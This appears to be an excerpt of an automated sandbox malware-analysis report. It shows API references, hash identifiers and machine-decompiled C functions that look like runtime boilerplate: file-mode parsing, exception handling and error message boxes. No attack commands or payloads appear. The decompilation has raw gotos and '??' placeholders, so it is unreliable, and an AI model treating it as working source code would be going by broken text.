                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF735C6198B,?,?,?,00007FF735C5C200,?,?,00000000,00007FF735C5313F), ref: 00007FF735C59D64
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF735C6198B,?,?,?,00007FF735C5C200,?,?,00000000,00007FF735C5313F), ref: 00007FF735C59D8C
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF735C6198B,?,?,?,00007FF735C5C200,?,?,00000000,00007FF735C5313F), ref: 00007FF735C59D9D
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF735C6198B,?,?,?,00007FF735C5C200,?,?,00000000,00007FF735C5313F), ref: 00007FF735C59DAE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                              • Opcode ID: 5bde44c314d0ebb7db8222551f7f36b2e81a00c41322f3d571ca49bf16941c33
                                                                                                                                                                                                                              • Instruction ID: f282631f1aa81b24bda68ab85f314e693d1af3f36a3d3afd063a710bc402bedf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5bde44c314d0ebb7db8222551f7f36b2e81a00c41322f3d571ca49bf16941c33
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51114C92A0820726F95872B34421079D3A28F81F6CFD40FB4D83E4A2D6DE2CB440E271
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C5E7B4 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                                                                                              			E00007FF77FF735C5E7B4(long long __rbx, signed int* __rcx, void* __rdx, long long __rdi, long long __rsi) {
				signed int _t31;
				signed int _t33;
				signed int _t36;
				signed int _t49;
				signed int _t56;
				void* _t61;
				void* _t83;
				signed int _t89;
				void* _t90;
				signed int _t94;
				signed int _t109;
				intOrPtr* _t129;
				signed short* _t131;
				signed short* _t132;
				long long _t136;
				signed int _t138;
				signed short* _t142;
				signed short* _t143;
				void* _t144;

				_t109 = _t138;
				 *((long long*)(_t109 + 8)) = __rbx;
				 *((long long*)(_t109 + 0x10)) = _t136;
				 *((long long*)(_t109 + 0x18)) = __rsi;
				 *((long long*)(_t109 + 0x20)) = __rdi;
				 *__rcx = _t109;
				__rcx[2] = 0;
				r14d = 0x20;
				_t31 =  *0x35c8a9fc; // 0x0
				__rcx[1] = _t31;
				goto 0x35c5e7f7;
				_t142 = __rdx + 2;
				_t33 =  *_t142 & 0x0000ffff;
				if (_t33 == r14w) goto 0x35c5e7ef;
				if (_t33 == 0x61) goto 0x35c5e824;
				if (_t33 == 0x72) goto 0x35c5e81b;
				if (_t33 != 0x77) goto 0x35c5ea88;
				 *__rcx = 0x301;
				goto 0x35c5e82a;
				__rcx[1] = 1;
				goto 0x35c5e831;
				 *__rcx = 0x109;
				__rcx[1] = 2;
				_t143 =  &(_t142[1]);
				r9b = bpl;
				dil = bpl;
				r10b = bpl;
				r11b = bpl;
				_t9 = _t136 + 0xa; // 0xa
				if ( *_t143 == 0) goto 0x35c5e99a;
				_t56 =  *_t143 & 0x0000ffff;
				_t83 = _t56 - 0x53;
				if (_t83 > 0) goto 0x35c5e904;
				if (_t83 == 0) goto 0x35c5e8ed;
				if (_t83 == 0) goto 0x35c5e985;
				if (_t83 == 0) goto 0x35c5e8bb;
				if (_t83 == 0) goto 0x35c5e8b3;
				if (_t83 == 0) goto 0x35c5e8a1;
				_t61 = _t56 - r14d - 0xfffffffffffffff2 - _t9;
				if (_t83 == 0) goto 0x35c5e898;
				if (_t61 != 4) goto 0x35c5ea88;
				if (r10b != 0) goto 0x35c5e978;
				 *__rcx =  *__rcx | 0x00000010;
				goto 0x35c5e8f9;
				asm("bts dword [ebx], 0x7");
				goto 0x35c5e983;
				if (( *__rcx & 0x00000040) != 0) goto 0x35c5e978;
				goto 0x35c5e981;
				r11b = 1;
				goto 0x35c5e978;
				if (dil != 0) goto 0x35c5e978;
				_t36 =  *__rcx;
				dil = 1;
				if ((_t36 & 0x00000002) != 0) goto 0x35c5e978;
				 *__rcx = _t36 & 0xfffffffe | 0x00000002;
				__rcx[1] = __rcx[1] & 0xfffffffc | 0x00000004;
				goto 0x35c5e985;
				_t89 = r10b;
				if (_t89 != 0) goto 0x35c5e978;
				 *__rcx =  *__rcx | r14d;
				r10b = 1;
				goto 0x35c5e985;
				if (_t89 == 0) goto 0x35c5e970;
				if (_t89 == 0) goto 0x35c5e961;
				if (_t89 == 0) goto 0x35c5e94f;
				if (_t89 == 0) goto 0x35c5e943;
				if (_t89 == 0) goto 0x35c5e934;
				_t90 = _t61 - 0x34 - 4;
				if (_t90 != 0) goto 0x35c5ea88;
				asm("bt eax, 0x9");
				if (_t90 >= 0) goto 0x35c5e978;
				asm("bts eax, 0xa");
				goto 0x35c5e981;
				if (( *__rcx & 0x0000c000) != 0) goto 0x35c5e978;
				asm("bts eax, 0xe");
				goto 0x35c5e981;
				if (r9b != 0) goto 0x35c5e978;
				asm("btr dword [ebx+0x4], 0xb");
				goto 0x35c5e959;
				if (r9b != 0) goto 0x35c5e978;
				asm("bts dword [ebx+0x4], 0xb");
				r9b = 1;
				goto 0x35c5e985;
				_t94 =  *__rcx & 0x0000c000;
				if (_t94 != 0) goto 0x35c5e978;
				asm("bts eax, 0xf");
				goto 0x35c5e981;
				asm("bt eax, 0xc");
				if (_t94 >= 0) goto 0x35c5e97d;
				goto 0x35c5e985;
				asm("bts eax, 0xc");
				asm("dec eax");
				_t144 = _t143 + __rcx;
				if (1 != 0) goto 0x35c5e848;
				_t128 =  ==  ? _t144 : _t144 + 2;
				goto 0x35c5e9ab;
				_t129 = ( ==  ? _t144 : _t144 + 2) + 2;
				if ( *_t129 == r14w) goto 0x35c5e9a7;
				if (r11b != 0) goto 0x35c5e9c8;
				if ( *_t129 != 0) goto 0x35c5ea88;
				__rcx[2] = 1;
				goto 0x35c5ea98;
				r8d = 3;
				if (E00007FF77FF735C5904C(_t144) != 0) goto 0x35c5ea88;
				goto 0x35c5e9ef;
				_t131 = _t129 + 8;
				_t49 =  *_t131 & 0x0000ffff;
				if (_t49 == r14w) goto 0x35c5e9eb;
				if (_t49 != 0x3d) goto 0x35c5ea88;
				_t132 =  &(_t131[1]);
				if ( *_t132 == r14w) goto 0x35c5ea02;
				r8d = 5;
				if (E00007FF77FF735C64634(_t109, _t132) != 0) goto 0x35c5ea2b;
				asm("bts dword [ebx], 0x12");
				goto 0x35c5ea6d;
				r8d = 8;
				if (E00007FF77FF735C64634(_t109, _t132) != 0) goto 0x35c5ea4d;
				asm("bts dword [ebx], 0x11");
				goto 0x35c5ea6d;
				r8d = 7;
				if (E00007FF77FF735C64634(_t109, _t132) != 0) goto 0x35c5ea88;
				asm("bts dword [ebx], 0x10");
				goto 0x35c5ea77;
				if (( *(_t132 + __rsi + 2) & 0x0000ffff) == r14w) goto 0x35c5ea73;
				goto 0x35c5e9b9;
				E00007FF77FF735C53B18(_t109);
				 *_t109 = 0x16;
				return E00007FF77FF735C59400();
			}






















                                                                                                                                                                                                                              0x7ff735c5e7b4
                                                                                                                                                                                                                              0x7ff735c5e7b7
                                                                                                                                                                                                                              0x7ff735c5e7bb
                                                                                                                                                                                                                              0x7ff735c5e7bf
                                                                                                                                                                                                                              0x7ff735c5e7c3
                                                                                                                                                                                                                              0x7ff735c5e7d2
                                                                                                                                                                                                                              0x7ff735c5e7d8
                                                                                                                                                                                                                              0x7ff735c5e7db
                                                                                                                                                                                                                              0x7ff735c5e7e1
                                                                                                                                                                                                                              0x7ff735c5e7e7
                                                                                                                                                                                                                              0x7ff735c5e7ed
                                                                                                                                                                                                                              0x7ff735c5e7ef
                                                                                                                                                                                                                              0x7ff735c5e7f3
                                                                                                                                                                                                                              0x7ff735c5e7fb
                                                                                                                                                                                                                              0x7ff735c5e801
                                                                                                                                                                                                                              0x7ff735c5e807
                                                                                                                                                                                                                              0x7ff735c5e80d
                                                                                                                                                                                                                              0x7ff735c5e813
                                                                                                                                                                                                                              0x7ff735c5e819
                                                                                                                                                                                                                              0x7ff735c5e81b
                                                                                                                                                                                                                              0x7ff735c5e822
                                                                                                                                                                                                                              0x7ff735c5e824
                                                                                                                                                                                                                              0x7ff735c5e82a
                                                                                                                                                                                                                              0x7ff735c5e831
                                                                                                                                                                                                                              0x7ff735c5e839
                                                                                                                                                                                                                              0x7ff735c5e83c
                                                                                                                                                                                                                              0x7ff735c5e83f
                                                                                                                                                                                                                              0x7ff735c5e842
                                                                                                                                                                                                                              0x7ff735c5e845
                                                                                                                                                                                                                              0x7ff735c5e84c
                                                                                                                                                                                                                              0x7ff735c5e852
                                                                                                                                                                                                                              0x7ff735c5e856
                                                                                                                                                                                                                              0x7ff735c5e859
                                                                                                                                                                                                                              0x7ff735c5e85f
                                                                                                                                                                                                                              0x7ff735c5e868
                                                                                                                                                                                                                              0x7ff735c5e871
                                                                                                                                                                                                                              0x7ff735c5e876
                                                                                                                                                                                                                              0x7ff735c5e87b
                                                                                                                                                                                                                              0x7ff735c5e87d
                                                                                                                                                                                                                              0x7ff735c5e87f
                                                                                                                                                                                                                              0x7ff735c5e884
                                                                                                                                                                                                                              0x7ff735c5e88d
                                                                                                                                                                                                                              0x7ff735c5e893
                                                                                                                                                                                                                              0x7ff735c5e896
                                                                                                                                                                                                                              0x7ff735c5e898
                                                                                                                                                                                                                              0x7ff735c5e89c
                                                                                                                                                                                                                              0x7ff735c5e8a5
                                                                                                                                                                                                                              0x7ff735c5e8ae
                                                                                                                                                                                                                              0x7ff735c5e8b3
                                                                                                                                                                                                                              0x7ff735c5e8b6
                                                                                                                                                                                                                              0x7ff735c5e8be
                                                                                                                                                                                                                              0x7ff735c5e8c4
                                                                                                                                                                                                                              0x7ff735c5e8c6
                                                                                                                                                                                                                              0x7ff735c5e8cb
                                                                                                                                                                                                                              0x7ff735c5e8da
                                                                                                                                                                                                                              0x7ff735c5e8e5
                                                                                                                                                                                                                              0x7ff735c5e8e8
                                                                                                                                                                                                                              0x7ff735c5e8ed
                                                                                                                                                                                                                              0x7ff735c5e8f0
                                                                                                                                                                                                                              0x7ff735c5e8f6
                                                                                                                                                                                                                              0x7ff735c5e8f9
                                                                                                                                                                                                                              0x7ff735c5e8ff
                                                                                                                                                                                                                              0x7ff735c5e907
                                                                                                                                                                                                                              0x7ff735c5e90c
                                                                                                                                                                                                                              0x7ff735c5e911
                                                                                                                                                                                                                              0x7ff735c5e916
                                                                                                                                                                                                                              0x7ff735c5e91b
                                                                                                                                                                                                                              0x7ff735c5e91d
                                                                                                                                                                                                                              0x7ff735c5e920
                                                                                                                                                                                                                              0x7ff735c5e928
                                                                                                                                                                                                                              0x7ff735c5e92c
                                                                                                                                                                                                                              0x7ff735c5e92e
                                                                                                                                                                                                                              0x7ff735c5e932
                                                                                                                                                                                                                              0x7ff735c5e93b
                                                                                                                                                                                                                              0x7ff735c5e93d
                                                                                                                                                                                                                              0x7ff735c5e941
                                                                                                                                                                                                                              0x7ff735c5e946
                                                                                                                                                                                                                              0x7ff735c5e948
                                                                                                                                                                                                                              0x7ff735c5e94d
                                                                                                                                                                                                                              0x7ff735c5e952
                                                                                                                                                                                                                              0x7ff735c5e954
                                                                                                                                                                                                                              0x7ff735c5e959
                                                                                                                                                                                                                              0x7ff735c5e95f
                                                                                                                                                                                                                              0x7ff735c5e963
                                                                                                                                                                                                                              0x7ff735c5e968
                                                                                                                                                                                                                              0x7ff735c5e96a
                                                                                                                                                                                                                              0x7ff735c5e96e
                                                                                                                                                                                                                              0x7ff735c5e972
                                                                                                                                                                                                                              0x7ff735c5e976
                                                                                                                                                                                                                              0x7ff735c5e97b
                                                                                                                                                                                                                              0x7ff735c5e97d
                                                                                                                                                                                                                              0x7ff735c5e989
                                                                                                                                                                                                                              0x7ff735c5e98f
                                                                                                                                                                                                                              0x7ff735c5e994
                                                                                                                                                                                                                              0x7ff735c5e9a1
                                                                                                                                                                                                                              0x7ff735c5e9a5
                                                                                                                                                                                                                              0x7ff735c5e9a7
                                                                                                                                                                                                                              0x7ff735c5e9af
                                                                                                                                                                                                                              0x7ff735c5e9b4
                                                                                                                                                                                                                              0x7ff735c5e9b9
                                                                                                                                                                                                                              0x7ff735c5e9bf
                                                                                                                                                                                                                              0x7ff735c5e9c3
                                                                                                                                                                                                                              0x7ff735c5e9c8
                                                                                                                                                                                                                              0x7ff735c5e9df
                                                                                                                                                                                                                              0x7ff735c5e9e9
                                                                                                                                                                                                                              0x7ff735c5e9eb
                                                                                                                                                                                                                              0x7ff735c5e9ef
                                                                                                                                                                                                                              0x7ff735c5e9f6
                                                                                                                                                                                                                              0x7ff735c5e9fc
                                                                                                                                                                                                                              0x7ff735c5ea02
                                                                                                                                                                                                                              0x7ff735c5ea0a
                                                                                                                                                                                                                              0x7ff735c5ea0c
                                                                                                                                                                                                                              0x7ff735c5ea23
                                                                                                                                                                                                                              0x7ff735c5ea25
                                                                                                                                                                                                                              0x7ff735c5ea29
                                                                                                                                                                                                                              0x7ff735c5ea2b
                                                                                                                                                                                                                              0x7ff735c5ea42
                                                                                                                                                                                                                              0x7ff735c5ea44
                                                                                                                                                                                                                              0x7ff735c5ea4b
                                                                                                                                                                                                                              0x7ff735c5ea4d
                                                                                                                                                                                                                              0x7ff735c5ea64
                                                                                                                                                                                                                              0x7ff735c5ea66
                                                                                                                                                                                                                              0x7ff735c5ea71
                                                                                                                                                                                                                              0x7ff735c5ea7e
                                                                                                                                                                                                                              0x7ff735c5ea83
                                                                                                                                                                                                                              0x7ff735c5ea88
                                                                                                                                                                                                                              0x7ff735c5ea8d
                                                                                                                                                                                                                              0x7ff735c5eab5

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                              • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                              • Opcode ID: 7f6f0c1095de52e436b3e8792f24808b6adbbe7d5d48c69c0f24dc09c05732c5
                                                                                                                                                                                                                              • Instruction ID: 41318de9597cf9de126ad7b81705906fba40ac2699cf6096a29f7ecd6f14d74b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f6f0c1095de52e436b3e8792f24808b6adbbe7d5d48c69c0f24dc09c05732c5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8281C6F3D0C253A5FBA57EA7C1502B8EAA0AB11F4CFD548B0CA0957294CB2DF405B369
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C4D3F0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                                                                                              			E00007FF77FF735C4D3F0(long long __rbx, intOrPtr* __rcx, long long __rdx, long long __r8, void* __r9) {
				void* _t19;
				void* _t27;
				void* _t36;
				void* _t39;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t46;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;

				_t27 = _t45;
				 *((long long*)(_t27 + 0x20)) = __rbx;
				 *((long long*)(_t27 + 0x18)) = __r8;
				 *((long long*)(_t27 + 0x10)) = __rdx;
				_t43 = _t27 - 0x3f;
				_t46 = _t45 - 0xc0;
				if ( *__rcx == 0x80000003) goto 0x35c4d494;
				E00007FF77FF735C4C03C(_t27);
				r12d =  *((intOrPtr*)(_t43 + 0x6f));
				if ( *((long long*)(_t27 + 0x10)) == 0) goto 0x35c4d4af;
				__imp__EncodePointer(_t59, _t56, _t54, _t52, _t36, _t39, _t42);
				E00007FF77FF735C4C03C(_t27);
				if ( *((intOrPtr*)(_t27 + 0x10)) == _t27) goto 0x35c4d4af;
				if ( *__rcx == 0xe0434f4d) goto 0x35c4d4af;
				r13d =  *((intOrPtr*)(_t43 + 0x77));
				if ( *__rcx == 0xe0434352) goto 0x35c4d4b3;
				 *((intOrPtr*)(_t46 + 0x38)) = r12d;
				 *((long long*)(_t46 + 0x30)) =  *((intOrPtr*)(_t43 + 0x7f));
				 *((intOrPtr*)(_t46 + 0x28)) = r13d;
				 *((long long*)(_t46 + 0x20)) =  *((intOrPtr*)(_t43 + 0x67));
				_t19 = E00007FF77FF735C4C4D0(__rcx,  *((intOrPtr*)(_t43 + 0x4f)), __r8, __r9);
				if (_t19 == 0) goto 0x35c4d4b3;
				return _t19;
			}















                                                                                                                                                                                                                              0x7ff735c4d3f0
                                                                                                                                                                                                                              0x7ff735c4d3f3
                                                                                                                                                                                                                              0x7ff735c4d3f7
                                                                                                                                                                                                                              0x7ff735c4d3fb
                                                                                                                                                                                                                              0x7ff735c4d40a
                                                                                                                                                                                                                              0x7ff735c4d40e
                                                                                                                                                                                                                              0x7ff735c4d424
                                                                                                                                                                                                                              0x7ff735c4d426
                                                                                                                                                                                                                              0x7ff735c4d42b
                                                                                                                                                                                                                              0x7ff735c4d438
                                                                                                                                                                                                                              0x7ff735c4d43c
                                                                                                                                                                                                                              0x7ff735c4d445
                                                                                                                                                                                                                              0x7ff735c4d44e
                                                                                                                                                                                                                              0x7ff735c4d457
                                                                                                                                                                                                                              0x7ff735c4d460
                                                                                                                                                                                                                              0x7ff735c4d464
                                                                                                                                                                                                                              0x7ff735c4d474
                                                                                                                                                                                                                              0x7ff735c4d47c
                                                                                                                                                                                                                              0x7ff735c4d481
                                                                                                                                                                                                                              0x7ff735c4d486
                                                                                                                                                                                                                              0x7ff735c4d48b
                                                                                                                                                                                                                              0x7ff735c4d492
                                                                                                                                                                                                                              0x7ff735c4d4ae

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                              • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                              • Opcode ID: b9fece4b103c0f6859bc33ac1d4040c4f27eb7d62c8eb887a549bcf41048b039
                                                                                                                                                                                                                              • Instruction ID: ffbdb0471c87a86e951abbfee2358ade76618572a7e05cf5a814381c9642543e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b9fece4b103c0f6859bc33ac1d4040c4f27eb7d62c8eb887a549bcf41048b039
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 835189B3A08A979AE721AF65D0807ADB7A1FB48B8CF450126EF4D17B58CF38E444C710
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C42580 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67windowCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 63%
                                                                                                                                                                                                                              			E00007FF77FF735C42580(void* __eflags, void* __rax, long long __rcx, signed long long __rdx, long long __r8, long long __r9, long long _a8, signed long long _a16, char _a24, long long _a32, char _a1048, char _a2072, char _a4120, signed int _a6168, char _a6232) {
				void* __rbx;
				void* __rsi;
				void* _t22;
				void* _t27;
				void* _t39;
				void* _t40;
				signed long long _t45;
				signed long long _t46;
				void* _t65;
				void* _t75;
				void* _t76;

				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_t22 = E00007FF77FF735C4A3B0(0x1840, __rax, _t75, _t76);
				_t66 = _t65 - __rax;
				_t45 =  *0x35c7b008; // 0x861d85c91f07
				_t46 = _t45 ^ _t65 - __rax;
				_a6168 = _t46;
				_t47 = __rdx;
				E00007FF77FF735C41040(_t22);
				_a16 =  &_a6232;
				_a8 = 0;
				r8d = 0x400;
				E00007FF77FF735C532C4(_t39, _t40,  *_t46 | 0x00000002,  &_a1048, __r8, __rdx);
				E00007FF77FF735C53B18(_t46);
				E00007FF77FF735C53B38( *_t46, _t46, __rdx,  &_a6232);
				_a16 = _t46;
				_a8 = __rcx;
				_t27 = E00007FF77FF735C41BE0(_t46,  &_a24,  &_a1048, "%s%s: %s",  &_a1048);
				r8d = 0x800;
				E00007FF77FF735C4B800(_t27, 0,  &_a2072,  &_a1048, "%s%s: %s");
				r8d = 0x400;
				E00007FF77FF735C47250(_t46, _t47,  &_a4120,  &_a24,  &_a6232, "%s%s: %s");
				if (_t46 == 0) goto 0x35c4268f;
				r8d = 0x400;
				E00007FF77FF735C47250(_t46, _t47,  &_a2072, "Fatal error detected",  &_a6232, "%s%s: %s");
				r9d = 0x30;
				MessageBoxW(??, ??, ??, ??);
				goto 0x35c426a9;
				r9d = 0x30;
				return E00007FF77FF735C4A410(MessageBoxA(??, ??, ??, ??), 0, _a6168 ^ _t66);
			}














                                                                                                                                                                                                                              0x7ff735c42580
                                                                                                                                                                                                                              0x7ff735c42585
                                                                                                                                                                                                                              0x7ff735c4258a
                                                                                                                                                                                                                              0x7ff735c42597
                                                                                                                                                                                                                              0x7ff735c4259c
                                                                                                                                                                                                                              0x7ff735c4259f
                                                                                                                                                                                                                              0x7ff735c425a6
                                                                                                                                                                                                                              0x7ff735c425a9
                                                                                                                                                                                                                              0x7ff735c425b1
                                                                                                                                                                                                                              0x7ff735c425bf
                                                                                                                                                                                                                              0x7ff735c425c4
                                                                                                                                                                                                                              0x7ff735c425d4
                                                                                                                                                                                                                              0x7ff735c425dd
                                                                                                                                                                                                                              0x7ff735c425ea
                                                                                                                                                                                                                              0x7ff735c425ef
                                                                                                                                                                                                                              0x7ff735c425f6
                                                                                                                                                                                                                              0x7ff735c425fb
                                                                                                                                                                                                                              0x7ff735c4260f
                                                                                                                                                                                                                              0x7ff735c4261e
                                                                                                                                                                                                                              0x7ff735c4262d
                                                                                                                                                                                                                              0x7ff735c42633
                                                                                                                                                                                                                              0x7ff735c42638
                                                                                                                                                                                                                              0x7ff735c4264b
                                                                                                                                                                                                                              0x7ff735c42653
                                                                                                                                                                                                                              0x7ff735c42655
                                                                                                                                                                                                                              0x7ff735c4266a
                                                                                                                                                                                                                              0x7ff735c4266f
                                                                                                                                                                                                                              0x7ff735c42687
                                                                                                                                                                                                                              0x7ff735c4268d
                                                                                                                                                                                                                              0x7ff735c4268f
                                                                                                                                                                                                                              0x7ff735c426c3

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                              • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                                                              • API String ID: 1878133881-2410924014
                                                                                                                                                                                                                              • Opcode ID: 3e845b8524da28d9f3316277b9ab0bce152de84f2c6dffe038d0211db346bddf
                                                                                                                                                                                                                              • Instruction ID: 3d4a9fc62a303a8350d95b5e7d64a42f9cd0cc286712e5557976406a03a838f0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e845b8524da28d9f3316277b9ab0bce152de84f2c6dffe038d0211db346bddf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 993174B3628693A1E621BB11E4517EAE3A5FB84F88FC04135EA8D47A89DE3CD305D750
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C439F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 33%
                                                                                                                                                                                                                              			E00007FF77FF735C439F0(void* __rax, long long __rcx, char _a24, signed int _a8216) {
				void* __rbx;
				intOrPtr _t16;
				signed long long _t21;
				signed long long _t22;
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t38;
				void* _t39;
				void* _t40;
				void* _t41;

				E00007FF77FF735C4A3B0(0x2030, __rax, _t40, _t41);
				_t36 = _t35 - __rax;
				_t21 =  *0x35c7b008; // 0x861d85c91f07
				_t22 = _t21 ^ _t35 - __rax;
				_a8216 = _t22;
				r8d = 0x1000;
				if (GetModuleFileNameW(??, ??, ??) != 0) goto 0x35c43a42;
				E00007FF77FF735C426D0(GetModuleFileNameW(??, ??, ??), _t22, "GetModuleFileNameW", "Failed to get executable path.\n", _t38, _t39);
				goto 0x35c43a6f;
				r8d = 0x1000;
				E00007FF77FF735C47360(_t16, __rcx, __rcx,  &_a24, _t33, _t34, _t38);
				if (_t22 != 0) goto 0x35c43a6a;
				E00007FF77FF735C42820(_t22, "Failed to convert executable path to UTF-8.\n",  &_a24, _t38, _t39);
				goto 0x35c43a6f;
				return E00007FF77FF735C4A410(1, 0, _a8216 ^ _t36);
			}














